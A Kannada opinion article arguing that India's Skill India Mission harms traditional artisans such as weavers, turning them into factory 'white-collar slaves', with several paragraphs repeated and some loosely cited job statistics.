ಸ್ಕಿಲ್ ಇಂಡಿಯಾ ಮಿಷನ್ ವೈಟ್‍ಕಾಲರ್ ಗುಲಾಮಗಿರಿಯ ನವನಾಗರಿಕತೆ

ಭಾರತದಲ್ಲಿ ಉದ್ಯೋಗಗಳನ್ನು ವಿಸ್ತರಿಸಬೇಕು. ಉದ್ಯೋಗ ನೀಡುವುದಕ್ಕಾಗಿ ಕೌಶಲ್ಯಪೂರ್ಣರನ್ನಾಗಿಸಬೇಕು ಎನ್ನುವ ಕಾರಣಕ್ಕೆ ಆರಂಭಿಸಿದ ಭಾರತ ಸರ್ಕಾರದ ‘ಸ್ಕಿಲ್ ಇಂಡಿಯಾ ಯೋಜನೆ’ ನಿಜಕ್ಕೂ ಪ್ರಯೋಜನಕಾರಿಯೇ?

ಮನುಷ್ಯನ ಜೀವನಕ್ರಮ ಬದಲಾದಂತೆ ಊಹಿಸುವುದಕ್ಕೂ ಅಸಾಧ್ಯ ಎನಿಸುವಷ್ಟು ಪ್ರಮಾಣದಲ್ಲಿ ಕುಶಲಕಲೆಗಳು ಬದಲಾವಣೆ ಹಾಗೂ ರೂಪಾಂತರವನ್ನು ಕಾಣುವುದು ಸಾಧ್ಯವಾಗಿದೆ ನಿಜ. ಆದರೆ ಕುಶಲಕಲೆಗಳ ಕರ್ತೃಗಳಾದ ಕುಶಲಕರ್ಮಿಗಳು ಮಾತ್ರ ಜೀವನ ಬದಲಾವಣೆಯನ್ನಾಗಲಿ ಅಥವಾ ಸುಧಾರಣೆಯನ್ನಾಗಲಿ ಕಾಣುವುದು ಇಂದಿಗೂ ಅಸಾಧ್ಯವೇ ಆಗಿದೆ.

ಹಾಗೆಂದ ಮಾತ್ರಕ್ಕೆ ಕುಶಲಕರ್ಮಿಗಳ ಎಲ್ಲಾ ಕುಶಲಕಲೆಗಳು ಕಾಲದ ಓಘದಲ್ಲಿ ಗೌಣವಾಗಿವೆ ಎಂದರ್ಥವಲ್ಲ. ದೇಶದ ಆರ್ಥಿಕತೆಯನ್ನು ಮತ್ತೊಂದು ಮಗ್ಗುಲಿನಿಂದ ಪೊರೆಯುತ್ತಿರುವ ಕುಶಲಕಲೆಗಳು ಬೆಳಕನ್ನೇ ಕಾಣದೆ ಶಾಶ್ವತವಾಗಿ ಮರೆಯಾಗುವುದಕ್ಕೆ ಇತಿಹಾಸ ಅನೇಕ ಕಾರಣಗಳನ್ನು ಹೊಳೆಯಿಸುತ್ತದೆ. ಆದರೆ ಸದ್ಯದ ಸ್ಥಿತಿ ಮಾತ್ರ ಭಿನ್ನ.

ಹಿತ್ತಲಿನಲ್ಲಿಯೇ ಉಳಿದುಹೋಗಿದ್ದ ಕುಶಲಕರ್ಮಿಗಳು ತಮ್ಮದೇ ಕೈಗಳಿಂದ ತಯಾರಾದ ದೀಪ ಮುಂದೊಂದು ದಿನ ಹಿತ್ತಲನ್ನೂ ಬೆಳಗಬಹುದು ಅಥವಾ ತಮಗೂ ಹಜಾರಕ್ಕೆ ಪ್ರವೇಶ ದೊರೆಯಬಹುದು ಎನ್ನುವ ಆಸೆಗಣ್ಣುಗಳಿಂದ ನೋಡುತ್ತಲೆ ಉಳಿಯುವಂತಾಗಿತ್ತು. ಹಿತ್ತಲಿನಲ್ಲಿಯೇ ಉಳಿದುಹೋಗಿದ್ದವರಿಗೆ ಸ್ವಾತಂತ್ರ್ಯ ನಂತರವೂ ಹಜಾರಕ್ಕೆ ಪ್ರವೇಶ ಕಲ್ಪಿಸಿಕೊಡುವ ಯಾವ ಪ್ರಯತ್ನಗಳು ಪ್ರಜ್ಞಾಪೂರ್ವಕವಾಗಿ ನಡೆದಿರಲಿಲ್ಲ. ಆದರೆ ಇಂತಹ ಭರವಸೆಯನ್ನು ಮುಂದಿಟ್ಟುಕೊಂಡು ಪ್ರಧಾನಿ ನರೇಂದ್ರ ಮೋದಿ ನೇತೃತ್ವದ ಎನ್‍ಡಿಎ ಸರ್ಕಾರ ದೇಶದ ಅತಿದೊಡ್ಡ ಯೋಜನೆಯಾದ ‘ಸ್ಕಿಲ್ ಇಂಡಿಯಾ ಮಿಷನ್’ ಆರಂಭಿಸಿತ್ತು.

ಆದರೆ ನಾಲ್ಕು ವರ್ಷಗಳ ಹಿಂದೆ ಆರಂಭವಾಗಿದ್ದ ಈ ಯೋಜನೆ ಇದೀಗ ತಲುಪುವ ಗಮ್ಯವನ್ನೇ ಕಾಣದೆ ಚಡಪಡಿಸುವಂತಾಗಿದೆ. ಈಗಾಗಲೇ ಭಾರತದ ಅವಿಭಾಜ್ಯವಾಗಿರುವ ಕಸುಬುಗಳನ್ನು ಕೌಶಲ್ಯಗೊಳಿಸುವ ಮೂಲಕ ಕುಶಲಕರ್ಮಿಗಳ ಬದುಕನ್ನು ಮತ್ತೊಂದು ಸ್ತರಕ್ಕೆ ಏರಿಸುವ ಸಲುವಾಗಿ ಆರಂಭವಾದ ‘ಸ್ಕಿಲ್ ಇಂಡಿಯಾ’ ಯೋಜನೆ ಅದೇ ಕುಶಲಕರ್ಮಿಗಳನ್ನು ಪ್ರಸ್ತುತ ಆಧುನಿಕಯುಗದ ಶಾಶ್ವತ ಗುಲಾಮರನ್ನಾಗಿಸುತ್ತಿದೆ.

ಏನಿದು ಸ್ಕಿಲ್ ಇಂಡಿಯಾ ಮಿಷನ್?

ಬ್ಲೂಮ್ಸ್‍ಬರ್ಗ್ ಅಧ್ಯಯನದ ಪ್ರಕಾರ ಪ್ರಸ್ತುತ ಭಾರತದ ಶೇಕಡಾ 36ರಷ್ಟು ಯುವ ಸಮುದಾಯ ಕಡೆಯ ಹಂತದ ಶಿಕ್ಷಣ, ಟ್ರೈನಿಂಗ್, ಅಪ್ರೆಂಟಿಶಿಪ್‍ನಂತಹ ಸ್ಥಿತಿಯಲ್ಲಿದೆ. ಇನ್ನು ಅಧ್ಯಾಯನದ ಅಂಶಗಳನ್ನು ಮುಂದುವರೆಸಿ ಹೇಳುವುದಾದರೆ 2026ರ ಹೊತ್ತಿಗೆ ಭಾರತದ ಶೇಕಡಾ 64ರಷ್ಟು ಜನರು ದುಡಿಯುವ ವರ್ಗದ ಪರಿಧಿಯೊಳಗೆ ಸೇರಿದವರಾಗುತ್ತಾರೆ. ಹೀಗಾಗಿ 2025ರ ಹೊತ್ತಿಗೆ ಭಾರತ ವಿಶ್ವದಲ್ಲಿಯೇ ಅತಿಹೆಚ್ಚು ದುಡಿಯುವ ವರ್ಗದ ಸಮುದಾಯವನ್ನು ಹೊಂದುವ ರಾಷ್ಟ್ರವಾಗುತ್ತದೆ.

ಉದ್ಯೋಗವನ್ನು ಕಲ್ಪಿಸುವ ಭರದಲ್ಲಿ ಯುವಸಮುದಾಯವನ್ನು ಒಂದೇ ಬಗೆಯ ಉದ್ಯೋಗಗಳಲ್ಲಿ ನುರಿತವರನ್ನಾಗಿಸುವುದೇ ಭವಿಷ್ಯದಲ್ಲಿ ಎದುರಿಸಬೇಕಾಗಿರುವ ಬಹುದೊಡ್ಡ ಸಮಸ್ಯೆ. ಏಕೆಂದರೆ ಇದೇ ಬ್ಲೂಮ್ಸ್‍ಬರ್ಗ್‍ನ ಅಧ್ಯಯನದ ದತ್ತಾಂಶ 2025ರ ಹೊತ್ತಿಗೆ ವಿಶ್ವದಲ್ಲಿ 56.5ರಷ್ಟು ಉದ್ಯೋಗಗಳು ಸ್ಥಗಿತಗೊಳ್ಳುತ್ತವೆ ಮತ್ತು ದುಡಿಯುವ ಕೌಶಲ್ಯವಿದ್ದವರು ಕೂಡ ಉದ್ಯೋಗದಿಂದ ವಂಚಿತರಾಗುವ ಸಾಧ್ಯತೆಗಳನ್ನು ಗುರುತಿಸಿದೆ.

ಇದು ಭಾರತದ ಪ್ರಸ್ತುತ ಸ್ಥಿತಿ. ಅಪಾರ ಆತ್ಮವಿಶ್ವಾಸವನ್ನು ನೀಡುವ ಈ ಎಲ್ಲಾ ದತ್ತಾಂಶಗಳನ್ನು ಮತ್ತೊಂದು ರೀತಿಯಲ್ಲಿಯೂ ಅವಲೋಕಿಸುವುದಕ್ಕೆ ಸಾಧ್ಯವಿದೆ. ಉದ್ಯೋಗವನ್ನು ಕಲ್ಪಿಸುವ ಭರದಲ್ಲಿ ಯುವಸಮುದಾಯವನ್ನು ಒಂದೇ ಬಗೆಯ ಉದ್ಯೋಗಗಳಲ್ಲಿ ನುರಿತವರನ್ನಾಗಿಸುವುದೇ ಭವಿಷ್ಯದಲ್ಲಿ ಎದುರಿಸಬೇಕಾಗಿರುವ ಬಹುದೊಡ್ಡ ಸಮಸ್ಯೆ. ಏಕೆಂದರೆ ಇದೇ ಬ್ಲೂಮ್ಸ್‍ಬರ್ಗ್‍ನ ಅಧ್ಯಯನದ ದತ್ತಾಂಶ 2025ರ ಹೊತ್ತಿಗೆ ವಿಶ್ವದಲ್ಲಿ 56.5ರಷ್ಟು ಉದ್ಯೋಗಗಳು ಸ್ಥಗಿತಗೊಳ್ಳುತ್ತವೆ ಮತ್ತು ದುಡಿಯುವ ಕೌಶಲ್ಯವಿದ್ದವರು ಕೂಡ ಉದ್ಯೋಗದಿಂದ ವಂಚಿತರಾಗುವ ಸಾಧ್ಯತೆಗಳನ್ನು ಗುರುತಿಸಿದೆ.

ನಿಜಸ್ಥಿತಿ ಇದು. ಹೀಗಿರುವಾಗ ಭಾರತ ಈಗಾಗಲೇ ‘ಸ್ಕಿಲ್ ಇಂಡಿಯಾ ಯೋಜನೆ’ಯ ಆರಂಭದಲ್ಲಿ ಘೋಷಿಸಿರುವ ವೇಗದಲ್ಲಿಯೇ ಕಾರ್ಯನಿರ್ವಹಣೆ ಮಾಡುವುದು ಮತ್ತು ನಿಗಧಿತ ಗುರಿಯನ್ನು ತಲುಪುವುದು ಸಾಧ್ಯವಾದರೆ ಈ ಯೋಜನೆಯ ಫಲವಾಗಿ 2025ರ ಹೊತ್ತಿಗೆ 47ಕೋಟಿ ಹೆಚ್ಚುವರಿ ಉದ್ಯೋಗಿಗಳನ್ನು ಸೃಷ್ಟಿಸಿರುತ್ತದೆ. ಹಾಗಾದರೆ ಹೆಚ್ಚುವರಿಯಾದ ಉದ್ಯೋಗಿಗಳ ಗತಿ ಏನು?

‘ಸ್ಕಿಲ್ ಇಂಡಿಯಾ ಯೋಜನೆ’ಯ ಅಡಿಯಲ್ಲಿ ಆಧುನಿಕ ಜಗತ್ತನ್ನು ಆಧಾರವಾಗಿಟ್ಟುಕೊಂಡು ಕರಗತ ಮಾಡಿಕೊಳ್ಳುವ ಕೌಶಲ್ಯಗಳಿಗೆ ಪ್ರತಿಯಾಗಿ ಉದ್ಯೋಗ ದೊರೆಯುವುದು ಎಲ್ಲಿ? ಹೊಂದಿದ ಕೌಶಲ್ಯಗಳಿಗೆ ದೊರೆಯದ ಉದ್ಯೋಗಗಳ ಹೊರತಾಗಿ ಜೀವನಾಧಾರಕ್ಕೆ ಅನುಸರಿಸಬೇಕಾಗಿರುವ ಹಾದಿ ಯಾವುದು? ಇದು ಈ ಯೋಜನೆಯ ಎದುರಿರುವ ಸದ್ಯದ ಯಕ್ಷಪ್ರಶ್ನೆ.

ಈ ಎರಡೂ ಯೋಜನೆಗಳು ಸಾವಿರಾರು ವರ್ಷಗಳಿಂದ ಇದೇ ನೆಲದಲ್ಲಿ ಅಭಿವೃದ್ದಿಗೊಂಡಿರುವ ಕುಶಲಕಲೆಗಳಿಗೆ ಆಧುನಿಕತೆಯ ವಸ್ತ್ರ ತೊಡಿಸಿ ಪ್ರಸ್ತುತಕ್ಕೆ ವರ್ಗಾಹಿಸುವ ಮೂಲಕ ಈಗಾಗಲೇ ನುರಿತವರನ್ನೇ ಟ್ರೈನಿಂಗ್, ಎಕ್ಸಾಟ್ರಾ ಲರ್ನಿಂಗ್ ಹಾಗೂ ಮಾಡಾರ್ನಿಟಿ ಹೆಸರಿನಲ್ಲಿ ಮತ್ತೊಂದು ಸ್ತರಕ್ಕೆ ಜಿಗಿಯಂತೆ ಬಿಗಿದು ದುಬಾರಿ ಕೂಲಿಯಾಳನ್ನಾಗಿಸಿಕೊಳ್ಳುತ್ತದೆ. ಆಧುನಿಕ ಗುಲಾಮರನ್ನಾಗಿಸಿ ರೂಪಿಸುತ್ತಿದೆ.

ಒಳಗಣ್ಣಿನಿಂದ ನೋಡುವುದು ಸಾಧ್ಯವಾದರೆ ಭಾರತದ ಮಹತ್ವದ ಯೋಜನೆ ಎನಿಸಿಕೊಂಡಿರುವ ‘ಮೇಕ್ ಇನ್ ಇಂಡಿಯಾ’ ಯೋಜನೆಗೆ ಪೂರಕವಾಗಿ ಆರಂಭವಾಗಿರುವ ಮತ್ತೊಂದು ಯೋಜನೆಯಿದು. ರೂಪದಲ್ಲಿ ಪ್ರತ್ಯೇಕ ಎನಿಸಿಕೊಂಡರು ಅಸಲಿಯತ್ತಿನಲ್ಲಿ ಖಂಡಿತವಾಗಿಯೂ ಭಿನ್ನವಾಗಿಲ್ಲ. ಈ ಎರಡು ಯೋಜನೆಗಳು ಒಂದೇ ನಾಣ್ಯದ ಮುಖದಂತಿದ್ದು, ಒಂದೇ ಗಮ್ಯದ ಕಡೆಗೆ ಚಲಿಸುತ್ತಿವೆ. ಈ ಎರಡೂ ಯೋಜನೆಗಳು ಸಾವಿರಾರು ವರ್ಷಗಳಿಂದ ಇದೇ ನೆಲದಲ್ಲಿ ಅಭಿವೃದ್ದಿಗೊಂಡಿರುವ ಕುಶಲಕಲೆಗಳಿಗೆ ಆಧುನಿಕತೆಯ ವಸ್ತ್ರ ತೊಡಿಸಿ ಪ್ರಸ್ತುತಕ್ಕೆ ವರ್ಗಾಹಿಸುವ ಮೂಲಕ ಈಗಾಗಲೇ ನುರಿತವರನ್ನೇ ಟ್ರೈನಿಂಗ್, ಎಕ್ಸಾಟ್ರಾ ಲರ್ನಿಂಗ್ ಹಾಗೂ ಮಾಡಾರ್ನಿಟಿ ಹೆಸರಿನಲ್ಲಿ ಮತ್ತೊಂದು ಸ್ತರಕ್ಕೆ ಜಿಗಿಯಂತೆ ಬಿಗಿದು ದುಬಾರಿ ಕೂಲಿಯಾಳನ್ನಾಗಿಸಿಕೊಳ್ಳುತ್ತದೆ. ಆಧುನಿಕ ಗುಲಾಮರನ್ನಾಗಿಸಿ ರೂಪಿಸುತ್ತಿದೆ.

ಕೇಂದ್ರದ ಕೌಶಲ್ಯಾಭಿವೃದ್ಧಿ ಸಚಿವಾಲಯ ‘ಸ್ಕಿಲ್ ಇಂಡಿಯಾ ಯೋಜನೆ’ ಅಡಿಯಲ್ಲಿ 34 ವಲಯಗಳಲ್ಲಿ ಉದ್ಯೋಗಿಗಳನ್ನು ಕೌಶಲ್ಯಪೂರ್ಣರನ್ನಾಗಿಸಲು ಮುಂದಾಗಿದೆ. ಆದರೆ ಕೇಂದ್ರ ಸರ್ಕಾರ ಈ ಎಲ್ಲಾ ವಲಯಗಳಿಂದಲೂ ಬಹುಮುಖ್ಯವಾದ ವಲಯಗಳೆಂದು ಕೇವಲ 10 ವಲಯಗಳನ್ನು ಮಾತ್ರವೇ ಆಯ್ಕೆ ಮಾಡಿಕೊಂಡಿವೆ. ಕೇವಲ ಆ ಹತ್ತು ವಲಯಗಳ ಕಡೆಗೆ ಆಕಾಂಕ್ಷಿಗಳನ್ನು ಸೆಳೆಯುವ ಯತ್ನವನ್ನು ನಿರಂತರವಾಗಿ ಮಾಡುತ್ತಿದೆ.

ಕೇಂದ್ರ ಸರ್ಕಾರ ಬಹುಮುಖ್ಯ ಎಂದು ಗುರುತಿಸಿರುವ ಎಲ್ಲಾ ವಲಯಗಳು ಕೌಶಲ್ಯಾಭಿವೃದ್ಧಿ ಸಚಿವಾಲಯದಿಂದ ಕರಗತ ಮಾಡಿಕೊಳ್ಳಬೇಕಾದ ಕೌಶಲ್ಯಗಳಲ್ಲ. ಈ ಎಲ್ಲವೂ ಭಾರತದಲ್ಲಿ ಹಲವು ಕಾರಣಗಳಿಂದ ಜನಾಂಗ, ಸಮುದಾಯ, ಪರಂಪರೆ ಹಾಗೂ ರೂಢಿಗತವಾಗಿ ಬಂದಿರುವಂತಹವು. ಸದ್ಯ ಭಾರತದಲ್ಲಿ ಈ ಬಗೆಯ ಉದ್ಯೋಗಗಳಲ್ಲಿ ಮುಳುಗಿಹೋಗಿರುವವರನ್ನು ಪರ್ಯಾಯ ವ್ಯವಸ್ಥೆಗೆ ಹೊಂದಿಸುವ ಪ್ರಯತ್ನಗಳು ನಡೆದಿರುವಂತೆ ಅವರ ಪಾರಂಪಾರಿಕ ಕಸುಬಿನೊಂದಿಗೆ ಉಳಿಯುವಂತೆ ನೋಡಿಕೊಳ್ಳುತ್ತಲೇ ಉನ್ನತ ಬದುಕನ್ನು ಕಲ್ಪಿಸುವ ಆಲೋಚನೆ ನಡೆಯಬೇಕಿದೆ.

ಮೊದಲು ಮೈ ಮುಚ್ಚುವುದಕ್ಕೆ ಮಾತ್ರವೇ ಬಳಕೆಯಾಗುತ್ತಿದ್ದ ನೇಕಾರಿಕೆ ಆಧುನಿಕತೆಯ ಈ ದಿನಗಳಲ್ಲಿ ಗ್ಲೌಸ್, ಶಾಲು, ಸಾಕ್ಸ್, ಬ್ಯಾಗ್‍ನಂತಹ ಪ್ರತಿಷ್ಠೆಯ ಪ್ರತೀಕವೂ ಆಗಿಹೋಗಿದೆ. ವಿಶ್ವದಾದ್ಯಂತ ಅನೇಕ ದೇಶಗಳು ನೇಕಾರಿಕೆಯನ್ನು ಮುಖ್ಯ ಉದ್ಯೋಗವನ್ನಾಗಿಸಿಕೊಂಡಿವೆ. ರಫ್ತು ಮತ್ತು ಆಮದಿನಲ್ಲೂ ನೇಕಾರಿಕೆ ಕ್ಷೇತ್ರಕ್ಕೆ ಸಂಬಂಧಿಸಿದ ವಸ್ತುಗಳೇ ಹೆಚ್ಚು ಕಾಣಿಸಿಕೊಳ್ಳುತ್ತವೆ.

ಆದರೆ ಇಂತಹ ಯಾವ ಪ್ರಯತ್ನವನ್ನು ಪ್ರಧಾನಿ ನರೇಂದ್ರ ಮೋದಿ ನೇತೃತ್ವದ ಎನ್‍ಡಿಎ ಸರ್ಕಾರ ‘ಸ್ಕಿಲ್ ಇಂಡಿಯಾ ಮಿಷನ್’ ಮೂಲಕ ನೆರವೇರಿಸುವ ಆಲೋಚನೆಯನ್ನು ಇಟ್ಟುಕೊಂಡಿಲ್ಲ. ಇದೇ ಕಾರಣಕ್ಕೆ ಇದೊಂದು ಆಧುನಿಕ ಗುಲಾಮಗಿರಿಯನ್ನು ಸೃಷ್ಟಿಸುವ ಹಿಂಬಾಗಿಲಿನ ಯೋಜನೆ ಎನ್ನುವುದು ಹಲವರ ಅಭಿಪ್ರಾಯ.

‘ಸ್ಕಿಲ್ ಇಂಡಿಯಾ ಯೋಜನೆ’ಯ ಮೂಲಕ ಭಾರತದ ಪಾರಂಪಾರಿಕ ಕೌಶಲ್ಯಕಲೆಗಳನ್ನು ಆಧುನಿಕತೆಗೆ ಒಗ್ಗಿಸಿದರೆ ಯಾಂತ್ರೀಕೃತವಾಗುವ ಸಾಧ್ಯತೆಗಳಿವೆಯೇ? ಖಂಡಿತಾ ಹೌದು. ಏಕೆಂದರೆ ಈ ಎಲ್ಲಾ ಕುಶಲಕಲೆಗಳನ್ನು ಅವುಗಳ ರೀತಿ ರಿವಾಜುಗಳಿಂದ ಕಳಚಿಕೊಳ್ಳುವಂತೆ ಮಾಡುವುದಲ್ಲದೇ, ಆ ಎಲ್ಲವನ್ನೂ ಆಧುನಿಕತೆಯ ವಾಸ್ತವಕ್ಕೆ ಒಗ್ಗಿಸುವ ಪ್ರಯತ್ನವನ್ನ ಮಾಡಲಾಗುತ್ತದೆ. ಇದೊಂದು ಪ್ರಕ್ರಿಯೆಯಿಂದಾಗಿ ಸಾವಿರಾರು ವರ್ಷಗಳಿಂದ ಸೃಜಶೀಲವಾಗಿ ಟಿಸಿಲೊಡೆಯುತ್ತಲೇ ಇರುವ ಕುಶಲಕಲೆಗಳು ಬುಡ ಕಡಿದ ಬೇರಿನಂತೆ ಒಣಗಿಹೋಗುತ್ತದೆ. ಕ್ರಮೇಣ ಯಾಂತ್ರೀಕೃತಗೊಳ್ಳುತ್ತವೆ. ಆದರೆ

ಕುಶಲಕಲೆಗಳು ಯಥಾಸ್ಥಿತಿಯನ್ನು ಉಳಿಸಿಕೊಳ್ಳುವುದು ಸಾಧ್ಯವಾದರೆ ಅವು ಪ್ರತಿಕ್ಷಣವೂ ಸೃಜನಾತ್ಮಕವೇ ಆಗಿರುತ್ತವೆ.

ವಿಶ್ವದಾದ್ಯಂತ ಅನೇಕ ದೇಶಗಳು ನೇಕಾರಿಕೆಯನ್ನು ಮುಖ್ಯ ಉದ್ಯೋಗವನ್ನಾಗಿಸಿಕೊಂಡಿವೆ. ರಫ್ತು ಮತ್ತು ಆಮದಿನಲ್ಲೂ ನೇಕಾರಿಕೆ ಕ್ಷೇತ್ರಕ್ಕೆ ಸಂಬಂಧಿಸಿದ ವಸ್ತುಗಳೇ ಹೆಚ್ಚು ಕಾಣಿಸಿಕೊಳ್ಳುತ್ತವೆ.

ಯುಗಗಳನ್ನು ಕ್ರಮಿಸಿ ನಡೆಯುತ್ತಿದ್ದಂತೆ ಬಟ್ಟೆ ಎನ್ನುವುದು ನೇಕಾರಿಕೆಯ ಹೆಸರಿನಿಂದ ಕರಕುಶಲವಾಗಿ, ಸಂಸ್ಕತಿಯ ಪ್ರತೀಕವಾಗಿ ವಾಸ್ತವದಲ್ಲಿ ಫ್ಯಾಶನ್ ರೂಪದಲ್ಲಿ ಬೃಹತ್ ಉದ್ಯಮವಾಗಿದೆ. ಯಾವುದೋ ಕುಗ್ರಾಮದಲ್ಲಿ ಜನಾಂಗವೊಂದಕ್ಕೆ ಸೀಮಿತವಾಗಿದ್ದ ನೇಕಾರಿಕೆ ಇಂದು ಎಲ್ಲಾ ಉದ್ಯಮಗಳಿಗಿಂತಲೂ ಬೃಹತ್ ಉದ್ಯಮವಾಗಿ ರೂಪಗೊಂಡಿದೆ. ಮೊದಲು ಮೈ ಮುಚ್ಚುವುದಕ್ಕೆ ಮಾತ್ರವೇ ಬಳಕೆಯಾಗುತ್ತಿದ್ದ ನೇಕಾರಿಕೆ ಆಧುನಿಕತೆಯ ಈ ದಿನಗಳಲ್ಲಿ ಗ್ಲೌಸ್, ಶಾಲು, ಸಾಕ್ಸ್, ಬ್ಯಾಗ್‍ನಂತಹ ಪ್ರತಿಷ್ಠೆಯ ಪ್ರತೀಕವೂ ಆಗಿಹೋಗಿದೆ. ವಿಶ್ವದಾದ್ಯಂತ ಅನೇಕ ದೇಶಗಳು ನೇಕಾರಿಕೆಯನ್ನು ಮುಖ್ಯ ಉದ್ಯೋಗವನ್ನಾಗಿಸಿಕೊಂಡಿವೆ. ರಫ್ತು ಮತ್ತು ಆಮದಿನಲ್ಲೂ ನೇಕಾರಿಕೆ ಕ್ಷೇತ್ರಕ್ಕೆ ಸಂಬಂಧಿಸಿದ ವಸ್ತುಗಳೇ ಹೆಚ್ಚು ಕಾಣಿಸಿಕೊಳ್ಳುತ್ತವೆ.

ಆದರೆ ಈ ನೆಲದ ಕಸುಬುಗಳು ಎನಿಸಿಕೊಂಡಿರುವ ಕರಕುಶಲದಂತಹ ಕೆಲಸಗಳು ನೇರವಾಗಿ ಸಮಾಜದೊಂದಿಗೆ ಮತ್ತು ಸಮಾಜದ ಸ್ವಾಸ್ಥ್ಯದೊಂದಿಗೆ ವ್ಯವಹರಿಸುತ್ತದೆ. ನೇಕಾರಿಕೆಯಂತಹ ಕೆಲಸಗಳು ವೈಯಕ್ತಿಕ ದುಡಿಮೆ ಹಾಗೂ ಬೆಳವಣಿಗೆಯನ್ನು ಗುರಿಯಾಗಿಸಿಕೊಂಡಿದೆ ಎನ್ನುವುದು ಮೇಲ್ಪದರಲ್ಲಿ ಗೋಚರಿಸುತ್ತದೆ ನಿಜ. ಆದರೆ ಆಳದಲ್ಲಿ ಈ ಬಗೆಯ ಕುಲಕಸುಬುಗಳು ಸಮುದಾಯದೊಂದಿಗೆ ಬೆಸೆದುಕೊಂಡಿರುತ್ತವೆ.

ಇಲ್ಲಿರುವ ಬಹುಮುಖ್ಯವಾದ ವಿಚಾರ ಎಂದರೆ ಈ ಎಲ್ಲಾ ಕೆಲಸಗಳು ಪ್ರತ್ಯೇಕ ಘಟಕದಲ್ಲಿ ನಡೆಯುತ್ತ ಅಂತಿಮವಾಗಿ ಒಂದೆಡೆ ಸಮ್ಮಿಳಿತಗೊಳ್ಳುವುದು ಮತ್ತು ಈ ಎಲ್ಲರೂ ಪ್ರತ್ಯೇಕವಾಗಿದ್ದು ಮತ್ತೊಬ್ಬರನ್ನು ಅವಲಂಭಿಸಿರುವುದು. ಇದೊಂದು ಸಮುದಾಯಪ್ರಜ್ಞೆ.

ಸದ್ಯ ಗಾರ್ಮೆಂಟ್‍ಗಳಲ್ಲಿ ಕಂಪ್ಯೂಟರ್ ಮೂಲಕ ಎಂಬ್ರಾಯಿಡರಿ ಮಾಡುವ ತಂತ್ರಜ್ಞಾನ ಪ್ರಚಲಿತದಲ್ಲಿದೆ. ಆದರೆ ನೇಕಾರಿಕೆಯ ಹಳೆಯ  ಸಂಸ್ಕೃತಿಯನ್ನು ಅವಲಂಬಿಸಿರುವವರು ಇಂದಿಗೂ ಬಟ್ಟೆಗಳ ಮೇಲೆ ಚಿತ್ತಾರ, ಕುಸುರಿ ಮತ್ತು ಅಚ್ಚಿನ ಕೆಲಸಗಳನ್ನು ಕೈಯಿಂದಲೇ ಹೆಣಿಗೆಯಾಕುತ್ತಾರೆ. ನೇಕಾರಿಕೆಗೆ ಸಂಬಂಧಿಸಿದ ಅಚ್ಚು, ಕುಸುರಿ ಹಾಗೂ ಚಿತ್ತಾರ ಸೇರಿದಂತೆ ಹೆಣೆಯುವ ಕೆಲಸವನ್ನ ಒಂದೇ ಘಟಕದಲ್ಲಿ ಪೂರ್ಣಗೊಳಿಸಲು ಸಾಧ್ಯವಿಲ್ಲ. ಈ ಎಲ್ಲವೂ ಪ್ರತ್ಯೇಕ ಘಟಕಗಳಲ್ಲಿ ಕಾರ್ಯನಿರ್ವಹಿಸಿ ಅಂತಿಮ ರೂಪ ಪಡೆಯುತ್ತವೆ. ಇಲ್ಲಿರುವ ಬಹುಮುಖ್ಯವಾದ ವಿಚಾರ ಎಂದರೆ ಈ ಎಲ್ಲಾ ಕೆಲಸಗಳು ಪ್ರತ್ಯೇಕ ಘಟಕದಲ್ಲಿ ನಡೆಯುತ್ತ ಅಂತಿಮವಾಗಿ ಒಂದೆಡೆ ಸಮ್ಮಿಳಿತಗೊಳ್ಳುವುದು ಮತ್ತು ಈ ಎಲ್ಲರೂ ಪ್ರತ್ಯೇಕವಾಗಿದ್ದು ಮತ್ತೊಬ್ಬರನ್ನು ಅವಲಂಭಿಸಿರುವುದು. ಇದೊಂದು ಸಮುದಾಯಪ್ರಜ್ಞೆ.

ಹಾಗಾದರೆ ಸಾವಿರಾರು ವರ್ಷಗಳಿಂದ ಬಳಕೆಯಲ್ಲಿರುವ ನೇಕಾರಿಕೆಯಲ್ಲಿ ಆಧುನಿಕತೆ ಎನ್ನುವುದು ಕಾಣಿಸಿಕೊಂಡಿಲ್ಲವಾ? ಖಂಡಿತಾ ಕಾಣಿಸಿಕೊಂಡಿದೆ. ಕೈಮಗ್ಗದಿಂದ ಇದೀಗ ವಿದ್ಯುತ್ ಮಿಷನ್‍ಗೆ ನೇಕಾರಿಕೆ ಕೆಲಸಗಾರರು ವರ್ಗವಾಗಿದ್ದಾರೆ. ಆದರೆ ಇಂತಹ ಬದಲಾವಣೆಗೆ ವರ್ಗವಾಗಿದ್ದು ಎಷ್ಟು ವರವಾಗಿದೆಯೋ ಅಷ್ಟೇ ಶಾಪವೂ ಆಗಿದೆ. ವಿದ್ಯುತ್ ಇಲ್ಲದೆ ನೇಕಾರಿಕೆಯನ್ನು ನಂಬಿಕೂತಿರುವವರು ನಿರ್ದಿಷ್ಟ ಪ್ರಮಾಣದಲ್ಲಿ ದುಡಿಯುವುದು ಸಾಧ್ಯವಾಗುತ್ತಿಲ್ಲ. ಕಾರಣ ವಿದ್ಯುತ್ ವ್ಯತ್ಯಯ ಹಾಗೂ ಮಾರುಕಟ್ಟೆಯಲ್ಲಿ ಮಧ್ಯಸ್ಥಿಕೆ ವಹಿಸುವವರ ಲಾಬಿಯ ಬಿಚ್ಚುಬಾಯಿಗಳು.

ಮುಂದೊಂದು ದಿನ ನವ ಸಾಮ್ರಾಜ್ಯಶಾಹಿಯಂತಹ ಫ್ಯಾಕ್ಟರಿಗಳಲ್ಲಿ ವೈಟ್‍ಕಾಲರ್ ಸ್ಲೇವ್‍ಗಳಾಗಿ ದುಡಿಯುವ ಕಾರ್ಮಿಕರನ್ನು ಸೃಷ್ಟಿಸುವುದು. ಆದರೆ ಸದ್ಯ ಭಾರತಕ್ಕೆ ಬೇಕಾಗಿರುವ ಸ್ವಾವಲಂಬನೆಯ ಬದುಕಿನ ಕ್ರಮವೇ ಬೇರೆ.

